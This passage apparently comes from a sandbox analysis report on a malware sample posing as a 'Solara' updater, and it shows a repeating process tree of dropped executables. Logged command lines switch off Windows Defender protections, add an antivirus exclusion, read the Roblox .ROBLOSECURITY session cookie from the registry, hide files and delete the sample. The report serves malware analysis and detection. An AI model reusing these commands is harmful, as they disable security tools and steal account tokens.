[10] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2156
    - Executes dropped EXE
[7] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1792
[8] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2112
    - Executes dropped EXE
[8] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2812
    - Executes dropped EXE
[9] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1776
[10] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2116
    - Loads dropped DLL
[11] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1976
    - Executes dropped EXE
[8] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2416
[9] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2596
    - Executes dropped EXE
[9] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2992
    - Executes dropped EXE
[10] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2692
[11] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2196
    - Loads dropped DLL
[12] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2980
    - Executes dropped EXE
[9] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2672
[10] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2676
    - Executes dropped EXE
[10] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1152
    - Executes dropped EXE
[11] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2392
[12] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1940
    - Loads dropped DLL
[13] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1444
    - Executes dropped EXE
[10] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2912
[11] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2696
    - Executes dropped EXE
[11] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1664
    - Executes dropped EXE
[12] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1964
[13] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:768
    - Loads dropped DLL
[14] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2552
    - Executes dropped EXE
[11] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2484
[12] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2496
    - Executes dropped EXE
[12] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:288
    - Executes dropped EXE
[13] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1784
[14] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1912
    - Loads dropped DLL
[15] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:3040
    - Executes dropped EXE
[12] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1524
[13] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2768
    - Executes dropped EXE
[13] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:332
    - Executes dropped EXE
[14] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2432
[15] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2580
    - Loads dropped DLL
[16] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1556
[13] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1860
[14] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1792
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[15] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:1148
    - Executes dropped EXE
[15] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2660
    - Drops file in Drivers directory
    - Executes dropped EXE
[16] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:1284
[16] C:\Windows\system32\attrib.exe  cmd: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:836
    - Views/modifies file attributes
[16] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'  PID:1624
    - Command and Scripting Interpreter: PowerShell
[16] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2  PID:1444
[16] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:2112
[16] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:2644
[16] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" os get Caption  PID:2508
[16] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" computersystem get totalphysicalmemory  PID:540
[16] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:1376
[16] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  PID:2952
[16] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic" path win32_VideoController get name  PID:2580
    - Detects videocard installed
[16] C:\Windows\system32\cmd.exe  cmd: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause  PID:2016
[17] C:\Windows\system32\PING.EXE  cmd: ping localhost  PID:2940
    - Runs ping.exe
[14] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2812
    - Executes dropped EXE
[15] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2664
[16] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:3060
    - Loads dropped DLL
[17] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2364
[14] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1736
[15] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1864
    - Executes dropped EXE
[15] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:796
    - Executes dropped EXE
[16] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:764
[17] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1116
    - Loads dropped DLL
[18] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:484
[15] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:3052
[16] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2144
    - Executes dropped EXE
[16] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:496
    - Executes dropped EXE
[17] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2656
[18] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2480
    - Loads dropped DLL
[19] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2264
[16] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2788
[17] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1612
    - Executes dropped EXE
[17] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1152
    - Executes dropped EXE
[18] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:856
[19] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2152
    - Loads dropped DLL
[20] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2160
[17] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:628
[18] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2564
    - Executes dropped EXE
[18] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1660
    - Executes dropped EXE
[19] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1620
[20] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2696
    - Loads dropped DLL
[21] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2708
[18] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2348
[19] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:948
    - Executes dropped EXE
[19] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1536
    - Executes dropped EXE
[20] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1596
[21] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:668
    - Loads dropped DLL
[22] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1660
[19] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2416
[20] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1476
    - Executes dropped EXE
[20] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:876
    - Executes dropped EXE
[21] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2136
[22] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2752
    - Loads dropped DLL
[23] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2932
[20] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1680
[21] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1752
    - Executes dropped EXE
[21] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2912
    - Executes dropped EXE
[22] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:296
[23] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2336
    - Loads dropped DLL
[24] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2432
[21] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2788
[22] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1660
    - Executes dropped EXE
[22] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2308
    - Executes dropped EXE
[23] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2472
[24] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:884
    - Loads dropped DLL
[25] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:572
[22] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1452
[23] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2284
    - Executes dropped EXE
[23] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2880
    - Executes dropped EXE
[24] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2256
[25] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1800
    - Loads dropped DLL
[26] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2776
[23] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2280
[24] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2748
    - Executes dropped EXE
[25] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:1800
[25] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2700
[24] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1508
    - Executes dropped EXE
[25] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1680
[26] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1740
    - Loads dropped DLL
[27] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2888
[24] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2440
[25] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1720
[25] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2908
[26] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2328
[27] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1856
    - Loads dropped DLL
[28] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1664
[25] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:1492
[26] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1780
[26] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1868
[27] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:760
[28] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2232
    - Loads dropped DLL
[29] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:1240
[26] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2872
[27] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2756
[27] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2596
[28] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1696
[29] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2580
    - Loads dropped DLL
[30] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2932
[27] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2148
[28] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2516
[28] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:1800
[29] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2120
[30] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:2968
    - Loads dropped DLL
[31] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2240
[28] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2196
[29] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2456
[30] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:2540
[30] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2872
    - Drops file in Drivers directory
[31] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:1604
[31] C:\Windows\system32\attrib.exe  cmd: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:1740
    - Views/modifies file attributes
[31] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'  PID:2656
    - Command and Scripting Interpreter: PowerShell
[31] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2  PID:2404
[31] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:1500
[31] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  PID:1808
[31] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" os get Caption  PID:3040
[31] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" computersystem get totalphysicalmemory  PID:2124
[31] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:1248
[31] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  PID:2348
[31] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic" path win32_VideoController get name  PID:2012
    - Detects videocard installed
[31] C:\Windows\system32\cmd.exe  cmd: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause  PID:2488
[32] C:\Windows\system32\PING.EXE  cmd: ping localhost  PID:2916
    - Runs ping.exe
[29] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2316
[30] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:1932
[31] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1872
    - Loads dropped DLL
[32] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2928
[29] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2568
[30] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:1992
    - Blocklisted process makes network request
[31] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:316
[31] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2956
[30] C:\Users\Admin\AppData\Local\Temp\sol.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\sol.exe"  PID:2848
[31] C:\Windows\SysWOW64\WScript.exe  cmd: "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"  PID:2448
[32] C:\Windows\SysWOW64\cmd.exe  cmd: cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "  PID:1296
    - Loads dropped DLL
[33] C:\hostNet\bridgeblockportComBroker.exe  cmd: "C:\hostNet/bridgeblockportComBroker.exe"  PID:2696
[30] C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"  PID:2772
[31] C:\Users\Admin\AppData\Local\Temp\Loader.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"  PID:2252
[32] C:\Users\Admin\AppData\Local\Temp\XClient.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"  PID:1328
[32] C:\Users\Admin\AppData\Local\Temp\RustCheat.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:2236
    - Drops file in Drivers directory
[33] C:\Windows\System32\Wbem\wmic.exe  cmd: "wmic.exe" csproduct get uuid  PID:1992
[33] C:\Windows\system32\attrib.exe  cmd: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"  PID:644
    - Views/modifies file attributes
[33] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'  PID:2532
    - Command and Scripting Interpreter: PowerShell
[33] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmd: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2  PID:2376
